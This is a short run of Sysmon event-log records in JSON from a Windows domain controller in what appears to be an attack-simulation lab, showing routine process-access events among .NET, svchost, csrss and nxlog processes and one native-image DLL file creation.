{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.670\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00106FF90F00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.670","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00106FF90F00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.826\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00102EFD0F00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.826","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00102EFD0F00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.826\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00102EFD0F00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.826","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00102EFD0F00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.841\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00102EFD0F00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.841","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00102EFD0F00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:38.341\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:38.341","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8649,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:39.357\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:39.357","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8650,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.373\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.373","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:40.701\r\nProcessGuid: {E2A3D6B1-138D-5F25-0000-00102EFD0F00}\r\nProcessId: 3216\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c90-0\\System.Web.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 07:02:40.701","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:40.701","ProcessGuid":"{E2A3D6B1-138D-5F25-0000-00102EFD0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c90-0\\System.Web.DataVisualization.dll","CreationUtcTime":"2020-08-01 07:02:40.701","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
